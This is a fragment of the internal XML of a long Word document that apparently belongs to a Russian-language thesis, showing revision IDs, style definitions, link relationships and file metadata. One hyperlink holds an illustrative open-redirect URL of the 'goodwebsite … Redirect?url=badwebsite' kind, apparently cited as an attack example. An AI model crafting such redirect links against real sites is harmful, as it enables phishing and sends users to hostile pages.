    <w:rsid w:val="00AA0AC4"/>
    <w:rsid w:val="00AA37E4"/>
    <w:rsid w:val="00AA5706"/>
    <w:rsid w:val="00AA5B9E"/>
    <w:rsid w:val="00AA6889"/>
    <w:rsid w:val="00AB0FB5"/>
    <w:rsid w:val="00AB27CC"/>
    <w:rsid w:val="00AB3E12"/>
    <w:rsid w:val="00AB6B30"/>
    <w:rsid w:val="00AC25AD"/>
    <w:rsid w:val="00AD0094"/>
    <w:rsid w:val="00AD1A6A"/>
    <w:rsid w:val="00AE0E1C"/>
    <w:rsid w:val="00AE10F8"/>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3EC6"/>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112"/>
    <w:rsid w:val="00BD5C4C"/>
    <w:rsid w:val="00BD63ED"/>
    <w:rsid w:val="00BE2C8A"/>
    <w:rsid w:val="00BE6243"/>
    <w:rsid w:val="00BF1801"/>
    <w:rsid w:val="00BF50CB"/>
    <w:rsid w:val="00BF681E"/>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5A2"/>
    <w:rsid w:val="00C62EC9"/>
    <w:rsid w:val="00C63496"/>
    <w:rsid w:val="00C64174"/>
    <w:rsid w:val="00C67F95"/>
    <w:rsid w:val="00C73BD1"/>
    <w:rsid w:val="00C7496F"/>
    <w:rsid w:val="00C76953"/>
    <w:rsid w:val="00C77083"/>
    <w:rsid w:val="00C7756E"/>
    <w:rsid w:val="00C8220D"/>
    <w:rsid w:val="00C82EAA"/>
    <w:rsid w:val="00C83B5B"/>
    <w:rsid w:val="00C91295"/>
    <w:rsid w:val="00C970B8"/>
    <w:rsid w:val="00C97DD1"/>
    <w:rsid w:val="00CA10CA"/>
    <w:rsid w:val="00CA25FD"/>
    <w:rsid w:val="00CB23DC"/>
    <w:rsid w:val="00CB408B"/>
    <w:rsid w:val="00CB576D"/>
    <w:rsid w:val="00CB5BA4"/>
    <w:rsid w:val="00CC2EBA"/>
    <w:rsid w:val="00CC3C0A"/>
    <w:rsid w:val="00CC514B"/>
    <w:rsid w:val="00CC7695"/>
    <w:rsid w:val="00CD5709"/>
    <w:rsid w:val="00CD5DAA"/>
    <w:rsid w:val="00CF3045"/>
    <w:rsid w:val="00CF5577"/>
    <w:rsid w:val="00CF6620"/>
    <w:rsid w:val="00D06CCC"/>
    <w:rsid w:val="00D1599B"/>
    <w:rsid w:val="00D16020"/>
    <w:rsid w:val="00D25175"/>
    <w:rsid w:val="00D31CF7"/>
    <w:rsid w:val="00D37B8B"/>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02FB"/>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258B2"/>
    <w:rsid w:val="00E301E6"/>
    <w:rsid w:val="00E325B2"/>
    <w:rsid w:val="00E364BF"/>
    <w:rsid w:val="00E41616"/>
    <w:rsid w:val="00E41FFA"/>
    <w:rsid w:val="00E43F36"/>
    <w:rsid w:val="00E473ED"/>
    <w:rsid w:val="00E550AA"/>
    <w:rsid w:val="00E5530C"/>
    <w:rsid w:val="00E577AD"/>
    <w:rsid w:val="00E645DF"/>
    <w:rsid w:val="00E64D3C"/>
    <w:rsid w:val="00E65C69"/>
    <w:rsid w:val="00E662A4"/>
    <w:rsid w:val="00E67720"/>
    <w:rsid w:val="00E73321"/>
    <w:rsid w:val="00E739D2"/>
    <w:rsid w:val="00E74F07"/>
    <w:rsid w:val="00E8167C"/>
    <w:rsid w:val="00EA2FFD"/>
    <w:rsid w:val="00EA376F"/>
    <w:rsid w:val="00EB2F89"/>
    <w:rsid w:val="00EB37C5"/>
    <w:rsid w:val="00EB413D"/>
    <w:rsid w:val="00EB6628"/>
    <w:rsid w:val="00EC10A8"/>
    <w:rsid w:val="00EC494F"/>
    <w:rsid w:val="00EC5625"/>
    <w:rsid w:val="00ED1D25"/>
    <w:rsid w:val="00ED302D"/>
    <w:rsid w:val="00ED3F24"/>
    <w:rsid w:val="00ED789E"/>
    <w:rsid w:val="00EF3376"/>
    <w:rsid w:val="00EF36ED"/>
    <w:rsid w:val="00EF7643"/>
    <w:rsid w:val="00F14744"/>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3005"/>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 w:type="paragraph" w:styleId="22">
    <w:name w:val="Quote"/>
    <w:aliases w:val="code"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="004A1170"/>
    <w:pPr>
      <w:ind w:left="862" w:right="862"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Цитата 2 Знак"/>
    <w:aliases w:val="code Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="004A1170"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="B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hyperlink" Target="https://github.com/kradunches/ari-metiostation" TargetMode="Externa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comments" Target="comments.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5.png"/><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6.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hyperlink" Target="http://www.goodwebsite.com/Redirect?url=http://www.badwebsite.com" TargetMode="Externa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hyperlink" Target="https://function-x.ru/statistics_dispersion_analysis.html"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oleObject" Target="embeddings/oleObject1.bin"/><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microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpe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hyperlink" Target="http://dx.doi.org/10.1080/01621459.1952.1048344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9</TotalTime>
  <Pages>112</Pages>
  <Words>21921</Words>
  <Characters>124956</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1041</Lines>
  <Paragraphs>293</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46584</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65</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-18T08:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-20T20:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>